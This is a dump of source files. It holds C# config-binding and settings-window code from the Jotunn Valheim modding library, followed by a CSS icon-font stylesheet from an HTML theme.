conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType == typeof(Vector2))
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundVector2>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
else if (entry.Value.SettingType.IsEnum)
{
var go = settings.AddConfig(mod.Key, $"{entry.Key.Key}:", entryAttributes.EntryColor,
description, entryAttributes.DescriptionColor);
var conf = go.AddComponent<ConfigBoundEnum>();
conf.SetData(mod.Value.Info.Metadata.GUID, entry.Value);
}
}
}
}
/// <summary>
/// Get all config entries of a module by GUID
/// </summary>
/// <param name="guid"></param>
/// <returns></returns>
private static IEnumerable<KeyValuePair<ConfigDefinition, ConfigEntryBase>> GetConfigurationEntries(string guid)
{
return GetConfigurationEntries(
BepInExUtils.GetDependentPlugins(true)
.FirstOrDefault(x => x.Key == guid).Value);
}
/// <summary>
/// Get all config entries of a module
/// </summary>
/// <param name="module"></param>
/// <returns></returns>
private static IEnumerable<KeyValuePair<ConfigDefinition, ConfigEntryBase>> GetConfigurationEntries(BaseUnityPlugin module)
{
using var enumerator = module.Config.GetEnumerator();
while (enumerator.MoveNext())
{
yield return enumerator.Current;
}
}
/// <summary>
/// Refresh the displayed values
/// </summary>
private static void ShowWindow()
{
var settings = SettingsRoot.GetComponent<ModSettings>();
if (Menu.instance)
{
Menu.instance.m_settingsInstance = SettingsRoot;
}
foreach (var plugin in settings.Plugins)
{
plugin.Value.gameObject.SetActive(
GetConfigurationEntries(plugin.Key)
.Any(x => x.Value.IsVisible() && x.Value.IsWritable()));
}
foreach (var section in settings.Sections)
{
section.gameObject.SetActive(
GetConfigurationEntries(section.GUID)
.Any(x => x.Key.Section == section.name && x.Value.IsVisible() && x.Value.IsWritable()));
}
foreach (var comp in settings.Configs
.SelectMany(config => config.GetComponents<MonoBehaviour>()
.Where(x => x.GetType().HasImplementedRawGeneric(typeof(ConfigBound<>)))))
{
var config = (IConfigBound)comp;
config.Read();
comp.gameObject.SetActive(config.Entry.IsWritable());
}
// Actually show the window
SettingsRoot.SetActive(true);
}
private static void HideWindow()
{
var settings = SettingsRoot.GetComponent<ModSettings>();
if (Menu.instance)
{
Menu.instance.m_settingsInstance = null;
}
foreach (var plugin in settings.Plugins.Values)
{
plugin.Content.gameObject.SetActive(false);
}
settings.CurrentPluginButton.gameObject.SetActive(false);
settings.ScrollRect.normalizedPosition = new Vector2(0f, 1f);
SettingsRoot.SetActive(false);
}
/// <summary>
/// Write all displayed values back to the config files
/// </summary>
private static void SaveConfiguration()
{
var settings = SettingsRoot.GetComponent<ModSettings>();
// Iterate over all configs
foreach (var comp in settings.Configs
.SelectMany(config => config.GetComponents<MonoBehaviour>()
.Where(x => x.GetType().HasImplementedRawGeneric(typeof(ConfigBound<>)))))
{
((IConfigBound)comp).Write();
}
// Sync changed config
SynchronizationManager.Instance.SynchronizeChangedConfig();
}
/// <summary>
/// Interface for the generic config bind class used in <see cref="SaveConfiguration"/>
/// </summary>
internal interface IConfigBound
{
public ConfigEntryBase Entry { get; set; }
public void Read();
public void Write();
}
/// <summary>
/// Generic abstract version of the config binding class
/// </summary>
/// <typeparam name="T"></typeparam>
internal abstract class ConfigBound<T> : MonoBehaviour, IConfigBound
{
public ModSettingConfig Config { get; set; }
public string ModGUID { get; set; }
public ConfigEntryBase Entry { get; set; }
public AcceptableValueBase Clamp { get; set; }
public ConfigurationManagerAttributes Attributes { get; set; }
public T Default { get; set; }
public T Value
{
get => GetValue();
set => SetValue(value);
}
public abstract T GetValue();
public abstract void SetValue(T value);
public void Read()
{
Value = (T)Entry.BoxedValue;
}
public void Write()
{
Entry.BoxedValue = Value;
}
public void SetData(string modGuid, ConfigEntryBase entry)
{
Config = gameObject.GetComponent<ModSettingConfig>();
ModGUID = modGuid;
Entry = entry;
Register();
Value = (T)Entry.BoxedValue;
Clamp = Entry.Description.AcceptableValues;
Attributes =
Entry.Description.Tags.FirstOrDefault(x =>
x is ConfigurationManagerAttributes) as ConfigurationManagerAttributes;
if (Attributes != null)
{
SetReadOnly(Attributes.ReadOnly == true);
if (Attributes.IsAdminOnly && !Attributes.IsUnlocked)
{
SetEnabled(false);
}
else
{
SetEnabled(true);
}
Default = (T)Entry.DefaultValue;
}
}
public abstract void Register();
public abstract void SetEnabled(bool enabled);
public abstract void SetReadOnly(bool readOnly);
public void Reset()
{
SetValue(Default);
}
// Wrap AcceptableValueBase's IsValid
public bool IsValid()
{
if (Clamp != null)
{
return Clamp.IsValid(Value);
}
return true;
}
}
/// <summary>
/// Boolean binding
/// </summary>
internal class ConfigBoundBoolean : ConfigBound<bool>
{
public override void Register()
{
Config.Toggle.gameObject.SetActive(true);
}
public override bool GetValue()
{
return Config.Toggle.isOn;
}
public override void SetValue(bool value)
{
Config.Toggle.isOn = value;
}
public override void SetEnabled(bool enabled)
{
Config.Toggle.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Toggle.enabled = !readOnly;
}
}
/// <summary>
/// Integer binding
/// </summary>
internal class ConfigBoundInt : ConfigBound<int>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.Integer;
if (Entry.Description.AcceptableValues is AcceptableValueRange<int> acceptableValueRange)
{
Config.Slider.gameObject.SetActive(true);
Config.Slider.minValue = acceptableValueRange.MinValue;
Config.Slider.maxValue = acceptableValueRange.MaxValue;
Config.Slider.onValueChanged.AddListener(value =>
Config.InputField.SetTextWithoutNotify(((int)value)
.ToString(CultureInfo.CurrentCulture)));
Config.InputField.onValueChanged.AddListener(text =>
{
if (int.TryParse(text, out var value))
{
Config.Slider.SetValueWithoutNotify(value);
}
});
}
Config.InputField.onValueChanged.AddListener(x =>
{
Config.InputField.textComponent.color = IsValid() ? Color.white : Color.red;
});
}
public override int GetValue()
{
if (!int.TryParse(Config.InputField.text, out var temp))
{
temp = Default;
}
return temp;
}
public override void SetValue(int value)
{
Config.InputField.text = value.ToString();
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// Float binding
/// </summary>
internal class ConfigBoundFloat : ConfigBound<float>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.Decimal;
if (Entry.Description.AcceptableValues is AcceptableValueRange<float> acceptableValueRange)
{
Config.Slider.gameObject.SetActive(true);
Config.Slider.minValue = acceptableValueRange.MinValue;
Config.Slider.maxValue = acceptableValueRange.MaxValue;
var step = Mathf.Clamp(Config.Slider.minValue / Config.Slider.maxValue, 0.1f, 1f);
Config.Slider.onValueChanged.AddListener(value =>
Config.InputField.SetTextWithoutNotify((Mathf.Round(value / step) * step)
.ToString("F3", CultureInfo.CurrentCulture)));
Config.InputField.onValueChanged.AddListener(text =>
{
if (float.TryParse(text, out var value))
{
Config.Slider.SetValueWithoutNotify(value);
}
});
}
Config.InputField.onValueChanged.AddListener(x =>
{
Config.InputField.textComponent.color = IsValid() ? Color.white : Color.red;
});
}
public override float GetValue()
{
if (!float.TryParse(Config.InputField.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var temp))
{
temp = Default;
}
return temp;
}
public override void SetValue(float value)
{
Config.InputField.text = value.ToString("F3");
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// Double binding
/// </summary>
internal class ConfigBoundDouble : ConfigBound<double>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.Decimal;
if (Entry.Description.AcceptableValues is AcceptableValueRange<double> acceptableValueRange)
{
Config.Slider.gameObject.SetActive(true);
Config.Slider.minValue = (float)acceptableValueRange.MinValue;
Config.Slider.maxValue = (float)acceptableValueRange.MaxValue;
var step = Mathf.Clamp(Config.Slider.minValue / Config.Slider.maxValue, 0.1f, 1f);
Config.Slider.onValueChanged.AddListener(value =>
Config.InputField.SetTextWithoutNotify((Mathf.Round(value / step) * step)
.ToString("F3", CultureInfo.CurrentCulture)));
Config.InputField.onValueChanged.AddListener(text =>
{
if (double.TryParse(text, out var value))
{
Config.Slider.SetValueWithoutNotify((float)value);
}
});
}
Config.InputField.onValueChanged.AddListener(x =>
{
Config.InputField.textComponent.color = IsValid() ? Color.white : Color.red;
});
}
public override double GetValue()
{
if (!double.TryParse(Config.InputField.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var temp))
{
temp = Default;
}
return temp;
}
public override void SetValue(double value)
{
Config.InputField.text = value.ToString("F3");
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// String binding
/// </summary>
internal class ConfigBoundString : ConfigBound<string>
{
public override void Register()
{
Config.InputField.gameObject.SetActive(true);
Config.InputField.characterValidation = InputField.CharacterValidation.None;
Config.InputField.contentType = InputField.ContentType.Standard;
}
public override string GetValue()
{
return Config.InputField.text;
}
public override void SetValue(string value)
{
Config.InputField.text = value;
}
public override void SetEnabled(bool enabled)
{
Config.InputField.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.InputField.readOnly = readOnly;
Config.InputField.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// KeyCode binding
/// </summary>
internal class ConfigBoundKeyCode : ConfigBound<KeyCode>
{
private Text Text;
public override void Register()
{
Config.Button.gameObject.SetActive(true);
Text = Config.Button.transform.Find("Text").GetComponent<Text>();
}
public override KeyCode GetValue()
{
if (Enum.TryParse(Text.text, out KeyCode temp))
{
return temp;
}
Logger.LogError($"Error parsing Keycode {Text.text}");
return KeyCode.None;
}
public override void SetValue(KeyCode value)
{
Text.text = value.ToString();
}
public void Start()
{
var buttonName = Entry.GetBoundButtonName();
Config.Button.onClick.AddListener(() =>
{
SettingsRoot.GetComponent<ModSettings>().OpenBindDialog(buttonName, KeyBindCheck);
});
}
private bool KeyBindCheck()
{
foreach (KeyCode key in Enum.GetValues(typeof(KeyCode)))
{
if (Input.GetKeyDown(key))
{
SetValue(key);
if (ZInput.m_binding != null)
{
ZInput.m_binding.m_key = key;
}
return true;
}
}
return false;
}
public override void SetEnabled(bool enabled)
{
Config.Button.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Button.enabled &= readOnly;
Text.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// KeyboardShortcut binding
/// </summary>
internal class ConfigBoundKeyboardShortcut : ConfigBound<KeyboardShortcut>
{
private static readonly IEnumerable<KeyCode> KeysToCheck = KeyboardShortcut.AllKeyCodes.Except(new[] { KeyCode.Mouse0, KeyCode.None }).ToArray();
private Text Text;
public override void Register()
{
Config.Button.gameObject.SetActive(true);
Text = Config.Button.transform.Find("Text").GetComponent<Text>();
}
public override KeyboardShortcut GetValue()
{
return KeyboardShortcut.Deserialize(Text.text);
}
public override void SetValue(KeyboardShortcut value)
{
Text.text = value.ToString();
}
public void Start()
{
var buttonName = Entry.GetBoundButtonName();
Config.Button.onClick.AddListener(() =>
{
SettingsRoot.GetComponent<ModSettings>().OpenBindDialog(buttonName, KeyBindCheck);
});
}
private bool KeyBindCheck()
{
foreach (var key in KeysToCheck)
{
if (Input.GetKeyUp(key))
{
SetValue(new KeyboardShortcut(key, KeysToCheck.Where(Input.GetKey).ToArray()));
if (ZInput.m_binding != null)
{
ZInput.m_binding.m_key = key;
}
return true;
}
}
return false;
}
public override void SetEnabled(bool enabled)
{
Config.Button.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Button.enabled &= readOnly;
Text.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// GamepadButton binding
/// </summary>
internal class ConfigBoundGamepadButton : ConfigBound<InputManager.GamepadButton>
{
public override void Register()
{
Config.Dropdown.gameObject.SetActive(true);
Config.Dropdown.AddOptions(Enum.GetNames(typeof(InputManager.GamepadButton)).ToList());
}
public override InputManager.GamepadButton GetValue()
{
if (Enum.TryParse<InputManager.GamepadButton>(Config.Dropdown.options[Config.Dropdown.value].text, out var ret))
{
return ret;
}
return InputManager.GamepadButton.None;
}
public override void SetValue(InputManager.GamepadButton value)
{
Config.Dropdown.value = Config.Dropdown.options
.IndexOf(Config.Dropdown.options.FirstOrDefault(x =>
x.text.Equals(Enum.GetName(typeof(InputManager.GamepadButton), value))));
Config.Dropdown.RefreshShownValue();
}
public void Start()
{
var buttonName = $"Joy!{Entry.GetBoundButtonName()}";
Config.Dropdown.onValueChanged.AddListener(index =>
{
if (Enum.TryParse<InputManager.GamepadButton>(Config.Dropdown.options[index].text, out var btn) &&
ZInput.instance.m_buttons.TryGetValue(buttonName, out var def))
{
KeyCode keyCode = InputManager.GetGamepadKeyCode(btn);
string axis = InputManager.GetGamepadAxis(btn);
if (!string.IsNullOrEmpty(axis))
{
def.m_key = KeyCode.None;
bool invert = axis.StartsWith("-");
def.m_axis = axis.TrimStart('-');
def.m_inverted = invert;
}
else
{
def.m_axis = null;
def.m_key = keyCode;
}
}
});
}
public override void SetEnabled(bool enabled)
{
Config.Dropdown.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Dropdown.enabled = !readOnly;
Config.Dropdown.itemText.color = readOnly ? Color.grey : Color.white;
}
}
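/// <summary>
/// Color binding
/// </summary>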
internal class ConfigBoundColor : ConfigBound<Color>
{
public override void Register()
{
Config.ColorInput.transform.parent.gameObject.SetActive(true);
Config.ColorInput.onEndEdit.AddListener(SetButtonColor);
Config.ColorInput.characterValidation = InputField.CharacterValidation.None;
Config.ColorInput.contentType = InputField.ContentType.Alphanumeric;
Config.ColorButton.onClick.AddListener(ShowColorPicker);
}
public override Color GetValue()
{
var col = Config.ColorInput.text;
try
{
return ColorFromString(col);
}
catch (Exception e)
{
Logger.LogWarning(e);
Logger.LogWarning($"Using default value ({(Color)Entry.DefaultValue}) instead.");
return (Color)Entry.DefaultValue;
}
}
public override void SetValue(Color value)
{
Config.ColorInput.text = StringFromColor(value);
Config.ColorButton.targetGraphic.color = value;
}
public override void SetEnabled(bool enabled)
{
Config.ColorInput.enabled = enabled;
Config.ColorButton.enabled = enabled;
if (enabled)
{
Config.ColorInput.onEndEdit.AddListener(SetButtonColor);
Config.ColorButton.onClick.AddListener(ShowColorPicker);
}
else
{
Config.ColorInput.onEndEdit.RemoveAllListeners();
Config.ColorButton.onClick.RemoveAllListeners();
}
}
public override void SetReadOnly(bool readOnly)
{
Config.ColorInput.readOnly = readOnly;
Config.ColorInput.textComponent.color = readOnly ? Color.grey : Color.white;
Config.ColorButton.enabled = !readOnly;
}
private void SetButtonColor(string value)
{
if (string.IsNullOrEmpty(value))
{
return;
}
Config.ColorButton.targetGraphic.color = ColorFromString(value);
}
private void ShowColorPicker()
{
if (!ColorPicker.done)
{
ColorPicker.Cancel();
}
GUIManager.Instance.CreateColorPicker(
new Vector2(0.5f, 0.5f), new Vector2(0.5f, 0.5f), new Vector2(0.5f, 0.5f),
GetValue(), Entry.Definition.Key, SetValue, (c) => Config.ColorButton.targetGraphic.color = c,
true);
}
private string StringFromColor(Color col)
{
var r = (int)(col.r * 255f);
var g = (int)(col.g * 255f);
var b = (int)(col.b * 255f);
var a = (int)(col.a * 255f);
return $"{r:x2}{g:x2}{b:x2}{a:x2}".ToUpper();
}
private Color ColorFromString(string str)
{
if (long.TryParse(str.Trim().ToLower(), NumberStyles.HexNumber, NumberFormatInfo.InvariantInfo, out var fromHex))
{
var r = (int)(fromHex >> 24);
var g = (int)(fromHex >> 16 & 0xff);
var b = (int)(fromHex >> 8 & 0xff);
var a = (int)(fromHex & 0xff);
var result = new Color(r / 255f, g / 255f, b / 255f, a / 255f);
return result;
}
throw new ArgumentException($"'{str}' is not a valid color value");
}
}
/// <summary>
/// Vector2 binding
/// </summary>
internal class ConfigBoundVector2 : ConfigBound<Vector2>
{
public override void Register()
{
Config.Vector2InputX.transform.parent.gameObject.SetActive(true);
}
public override Vector2 GetValue()
{
if (!(float.TryParse(Config.Vector2InputX.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var tempX) &&
float.TryParse(Config.Vector2InputY.text, NumberStyles.Number,
CultureInfo.CurrentCulture.NumberFormat, out var tempY)))
{
return Default;
}
return new Vector2(tempX, tempY);
}
public override void SetValue(Vector2 value)
{
Config.Vector2InputX.text = value.x.ToString("F1");
Config.Vector2InputY.text = value.y.ToString("F1");
}
public override void SetEnabled(bool enabled)
{
Config.Vector2InputX.enabled = enabled;
Config.Vector2InputY.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Vector2InputX.readOnly = readOnly;
Config.Vector2InputX.textComponent.color = readOnly ? Color.grey : Color.white;
Config.Vector2InputY.readOnly = readOnly;
Config.Vector2InputY.textComponent.color = readOnly ? Color.grey : Color.white;
}
}
/// <summary>
/// Enum binding
/// </summary>
internal class ConfigBoundEnum : ConfigBound<Enum>
{
public override void Register()
{
Config.Dropdown.gameObject.SetActive(true);
Config.Dropdown.AddOptions(Enum.GetNames(Entry.SettingType).ToList());
}
public override Enum GetValue()
{
return (Enum)Enum.Parse(Entry.SettingType, Config.Dropdown.options[Config.Dropdown.value].text);
}
public override void SetValue(Enum value)
{
Config.Dropdown.value = Config.Dropdown.options
.IndexOf(Config.Dropdown.options.FirstOrDefault(x =>
x.text.Equals(Enum.GetName(Entry.SettingType, value))));
Config.Dropdown.RefreshShownValue();
}
public override void SetEnabled(bool enabled)
{
Config.Dropdown.enabled = enabled;
}
public override void SetReadOnly(bool readOnly)
{
Config.Dropdown.enabled = !readOnly;
Config.Dropdown.itemText.color = readOnly ? Color.grey : Color.white;
}
}
}
}
<|start_filename|>JotunnLib/Unity/Assets/Scripts/ModSettings.cs<|end_filename|>
using System.Collections.Generic;
using System.Linq;
using UnityEngine;
using UnityEngine.UI;
namespace Jotunn.GUI
{
internal class ModSettings : MonoBehaviour
{
public GameObject PluginPrefab;
public GameObject SectionPrefab;
public GameObject ConfigPrefab;
public Image Panel;
public Text Header;
public ScrollRect ScrollRect;
public Button CurrentPluginButton;
public Button CancelButton;
public Button OKButton;
public GameObject BindDialog;
public KeyBindCheck CurrentKeyBindCheck;
public readonly Dictionary<string, ModSettingPlugin> Plugins = new Dictionary<string, ModSettingPlugin>();
public readonly List<ModSettingSection> Sections = new List<ModSettingSection>();
public readonly List<ModSettingConfig> Configs = new List<ModSettingConfig>();
public void AddPlugin(string pluginName, string text)
{
if (Plugins.ContainsKey(pluginName))
{
return;
}
var go = Instantiate(PluginPrefab, ScrollRect.content);
go.name = pluginName;
go.SetActive(true);
var plugin = go.GetComponent<ModSettingPlugin>();
plugin.Text.text = text;
Plugins.Add(pluginName, plugin);
}
public void AddSection(string pluginName, string sectionName)
{
if (!Plugins.TryGetValue(pluginName, out var plugin))
{
return;
}
var go = Instantiate(SectionPrefab, plugin.Content.transform);
go.name = sectionName;
go.SetActive(true);
var section = go.GetComponent<ModSettingSection>();
section.GUID = pluginName;
section.Text.text = sectionName;
Sections.Add(section);
}
public GameObject AddConfig(string pluginName, string entryName, Color entryColor, string description, Color descriptionColor)
{
if (!Plugins.TryGetValue(pluginName, out var plugin))
{
return null;
}
var go = Instantiate(ConfigPrefab, plugin.Content.transform);
go.SetActive(true);
var config = go.GetComponent<ModSettingConfig>();
config.Header.text = entryName;
config.Header.color = entryColor;
config.Description.text = description;
config.Description.color = descriptionColor;
Configs.Add(config);
return go;
}
public void OnScrollRectChanged(Vector2 position)
{
var overlaps = Plugins.Values.Select(x => x.Button.GetComponent<RectTransform>())
.Any(x => Overlaps(x, CurrentPluginButton.GetComponent<RectTransform>()));
CurrentPluginButton.gameObject.SetActive(!overlaps);
var currentPlugin = Plugins.Values.Select(x => x.Button)
.LastOrDefault(x =>
WorldRect(x.GetComponent<RectTransform>()).y >
WorldRect(CurrentPluginButton.GetComponent<RectTransform>()).y);
if (currentPlugin)
{
CurrentPluginButton.GetComponentInChildren<Text>().text = currentPlugin.GetComponentInChildren<Text>().text;
CurrentPluginButton.onClick = currentPlugin.onClick;
}
}
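// Returns the rect of a RectTransform in world space, centered on its position.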
private Rect WorldRect(RectTransform rectTransform)
{
Vector2 sizeDelta = rectTransform.sizeDelta;
float rectTransformWidth = sizeDelta.x * rectTransform.lossyScale.x;
float rectTransformHeight = sizeDelta.y * rectTransform.lossyScale.y;
Vector3 position = rectTransform.position;
return new Rect(position.x - rectTransformWidth / 2f, position.y - rectTransformHeight / 2f, rectTransformWidth, rectTransformHeight);
}
private bool Overlaps(RectTransform a, RectTransform b)
{
var recta = WorldRect(a);
var rectb = WorldRect(b);
return (int)recta.y == (int)rectb.y || (recta.y + recta.height > rectb.y && recta.y < rectb.y);
}
public delegate bool KeyBindCheck();
public void OpenBindDialog(string keyName, KeyBindCheck keyBindCheck)
{
ZInput.instance.StartBindKey(keyName ?? string.Empty);
CurrentKeyBindCheck = keyBindCheck;
BindDialog.SetActive(true);
}
private void Update()
{
if (BindDialog.activeSelf && CurrentKeyBindCheck.Invoke())
{
BindDialog.SetActive(false);
}
}
public void CreateTestConfig()
{
string modName = $"Test{Plugins.Count}";
ModSettingConfig config;
AddPlugin(modName, $"Test Mod {Plugins.Count}");
AddSection(modName, "First section");
config = AddConfig(modName, "Bool Test", Color.black, "Testing booleans", Color.black)
.GetComponent<ModSettingConfig>();
config.Toggle.gameObject.SetActive(true);
config = AddConfig(modName, "String Test", Color.black, "Testing strings", Color.black)
.GetComponent<ModSettingConfig>();
config.InputField.gameObject.SetActive(true);
AddSection(modName, "Second section");
config = AddConfig(modName, "KeyCode Test", Color.black, "Testing KeyCodes", Color.black)
.GetComponent<ModSettingConfig>();
config.InputField.gameObject.SetActive(true);
config.Dropdown.gameObject.SetActive(true);
}
}
}
| heinermann/Jotunn |
<|start_filename|>theme_source/stamp-html/video-bg/6-home-style-six/assets/icons/icons.css<|end_filename|>
@charset "UTF-8";
@font-face {
font-family: "stamp-icons";
src: url("fonts/stamp-icons.woff") format("woff"),
url("fonts/stamp-icons.ttf") format("truetype");
font-weight: normal;
font-style: normal;
}
[data-icon]:before {
font-family: "stamp-icons" !important;
content: attr(data-icon);
font-style: normal !important;
font-weight: normal !important;
font-variant: normal !important;
text-transform: none !important;
speak: none;
line-height: 1;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
[class^="icon-"]:before,
[class*=" icon-"]:before {
font-family: "stamp-icons" !important;
font-style: normal !important;
font-weight: normal !important;
font-variant: normal !important;
text-transform: none !important;
speak: none;
line-height: 1;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
.icon-weather-wind-e:before {
content: "\e000";
}
.icon-weather-wind-n:before {
content: "\e001";
}
.icon-weather-wind-ne:before {
content: "\e002";
}
.icon-weather-wind-nw:before {
content: "\e003";
}
.icon-weather-wind-s:before {
content: "\e004";
}
.icon-weather-wind-se:before {
content: "\e005";
}
.icon-weather-wind-sw:before {
content: "\e006";
}
.icon-weather-wind-w:before {
content: "\e007";
}
.icon-software-add-vectorpoint:before {
content: "\e008";
}
.icon-software-box-oval:before {
content: "\e009";
}
.icon-software-box-polygon:before {
content: "\e00a";
}
.icon-software-crop:before {
content: "\e00b";
}
.icon-software-eyedropper:before {
content: "\e00c";
}
.icon-software-font-allcaps:before {
content: "\e00d";
}
.icon-software-font-kerning:before {
content: "\e00e";
}
.icon-software-horizontal-align-center:before {
content: "\e00f";
}
.icon-software-layout:before {
content: "\e010";
}
.icon-software-layout-4boxes:before {
content: "\e011";
}
.icon-software-layout-header:before {
content: "\e012";
}
.icon-software-layout-header-2columns:before {
content: "\e013";
}
.icon-software-layout-header-3columns:before {
content: "\e014";
}
.icon-software-layout-header-4boxes:before {
content: "\e015";
}
.icon-software-layout-header-4columns:before {
content: "\e016";
}
.icon-software-layout-header-complex:before {
content: "\e017";
}
.icon-software-layout-header-complex2:before {
content: "\e018";
}
.icon-software-layout-header-complex3:before {
content: "\e019";
}
.icon-software-layout-header-complex4:before {
content: "\e01a";
}
.icon-software-layout-header-sideleft:before {
content: "\e01b";
}
.icon-software-layout-header-sideright:before {
content: "\e01c";
}
.icon-software-layout-sidebar-left:before {
content: "\e01d";
}
.icon-software-layout-sidebar-right:before {
content: "\e01e";
}
.icon-software-paragraph-align-left:before {
content: "\e01f";
}
.icon-software-paragraph-align-right:before {
content: "\e020";
}
.icon-software-paragraph-center:before {
content: "\e021";
}
.icon-software-paragraph-justify-all:before {
content: "\e022";
}
.icon-software-paragraph-justify-center:before {
content: "\e023";
}
.icon-software-paragraph-justify-left:before {
content: "\e024";
}
.icon-software-paragraph-justify-right:before {
content: "\e025";
}
.icon-software-pathfinder-exclude:before {
content: "\e026";
}
.icon-software-pathfinder-intersect:before {
content: "\e027";
}
.icon-software-pathfinder-subtract:before {
content: "\e028";
}
.icon-software-pathfinder-unite:before {
content: "\e029";
}
.icon-software-pen:before {
content: "\e02a";
}
.icon-software-pencil:before {
content: "\e02b";
}
.icon-software-scale-expand:before {
content: "\e02c";
}
.icon-software-scale-reduce:before {
content: "\e02d";
}
.icon-software-vector-box:before {
content: "\e02e";
}
.icon-software-vertical-align-bottom:before {
content: "\e02f";
}
.icon-software-vertical-distribute-bottom:before {
content: "\e030";
}
.icon-music-beginning-button:before {
content: "\e031";
}
.icon-music-bell:before {
content: "\e032";
}
.icon-music-eject-button:before {
content: "\e033";
}
.icon-music-end-button:before {
content: "\e034";
}
.icon-music-fastforward-button:before {
content: "\e035";
}
.icon-music-headphones:before {
content: "\e036";
}
.icon-music-microphone-old:before {
content: "\e037";
}
.icon-music-mixer:before {
content: "\e038";
}
.icon-music-pause-button:before {
content: "\e039";
}
.icon-music-play-button:before {
content: "\e03a";
}
.icon-music-rewind-button:before {
content: "\e03b";
}
.icon-music-shuffle-button:before {
content: "\e03c";
}
.icon-music-stop-button:before {
content: "\e03d";
}
.icon-ecommerce-bag:before {
content: "\e03e";
}
.icon-ecommerce-bag-check:before {
content: "\e03f";
}
.icon-ecommerce-bag-cloud:before {
content: "\e040";
}
.icon-ecommerce-bag-download:before {
content: "\e041";
}
.icon-ecommerce-bag-plus:before {
content: "\e042";
}
.icon-ecommerce-bag-upload:before {
content: "\e043";
}
.icon-ecommerce-basket-check:before {
content: "\e044";
}
.icon-ecommerce-basket-cloud:before {
content: "\e045";
}
.icon-ecommerce-basket-download:before {
content: "\e046";
}
.icon-ecommerce-basket-upload:before {
content: "\e047";
}
.icon-ecommerce-bath:before {
content: "\e048";
}
.icon-ecommerce-cart:before {
content: "\e049";
}
.icon-ecommerce-cart-check:before {
content: "\e04a";
}
.icon-ecommerce-cart-cloud:before {
content: "\e04b";
}
.icon-ecommerce-cart-content:before {
content: "\e04c";
}
.icon-ecommerce-cart-download:before {
content: "\e04d";
}
.icon-ecommerce-cart-plus:before {
content: "\e04e";
}
.icon-ecommerce-cart-upload:before {
content: "\e04f";
}
.icon-ecommerce-cent:before {
content: "\e050";
}
.icon-ecommerce-colon:before {
content: "\e051";
}
.icon-ecommerce-creditcard:before {
content: "\e052";
}
.icon-ecommerce-diamond:before {
content: "\e053";
}
.icon-ecommerce-dollar:before {
content: "\e054";
}
.icon-ecommerce-euro:before {
content: "\e055";
}
.icon-ecommerce-franc:before {
content: "\e056";
}
.icon-ecommerce-gift:before {
content: "\e057";
}
.icon-ecommerce-graph1:before {
content: "\e058";
}
.icon-ecommerce-graph2:before {
content: "\e059";
}
.icon-ecommerce-graph3:before {
content: "\e05a";
}
.icon-ecommerce-graph-decrease:before {
content: "\e05b";
}
.icon-ecommerce-graph-increase:before {
content: "\e05c";
}
.icon-ecommerce-guarani:before {
content: "\e05d";
}
.icon-ecommerce-kips:before {
content: "\e05e";
}
.icon-ecommerce-lira:before {
content: "\e05f";
}
.icon-ecommerce-money:before {
content: "\e060";
}
.icon-ecommerce-naira:before {
content: "\e061";
}
.icon-ecommerce-pesos:before {
content: "\e062";
}
.icon-ecommerce-pound:before {
content: "\e063";
}
.icon-ecommerce-receipt:before {
content: "\e064";
}
.icon-ecommerce-sale:before {
content: "\e065";
}
.icon-ecommerce-sales:before {
content: "\e066";
}
.icon-ecommerce-tugriks:before {
content: "\e067";
}
.icon-ecommerce-wallet:before {
content: "\e068";
}
.icon-ecommerce-won:before {
content: "\e069";
}
.icon-ecommerce-yen:before {
content: "\e06a";
}
.icon-ecommerce-yen2:before {
content: "\e06b";
}
.icon-basic-elaboration-briefcase-check:before {
content: "\e06c";
}
.icon-basic-elaboration-briefcase-download:before {
content: "\e06d";
}
.icon-basic-elaboration-browser-check:before {
content: "\e06e";
}
.icon-basic-elaboration-browser-download:before {
content: "\e06f";
}
.icon-basic-elaboration-browser-plus:before {
content: "\e070";
}
.icon-basic-elaboration-calendar-check:before {
content: "\e071";
}
.icon-basic-elaboration-calendar-cloud:before {
content: "\e072";
}
.icon-basic-elaboration-calendar-download:before {
content: "\e073";
}
.icon-basic-elaboration-calendar-empty:before {
content: "\e074";
}
.icon-basic-elaboration-calendar-heart:before {
content: "\e075";
}
.icon-basic-elaboration-cloud-download:before {
content: "\e076";
}
.icon-basic-elaboration-cloud-check:before {
content: "\e077";
}
.icon-basic-elaboration-cloud-search:before {
content: "\e078";
}
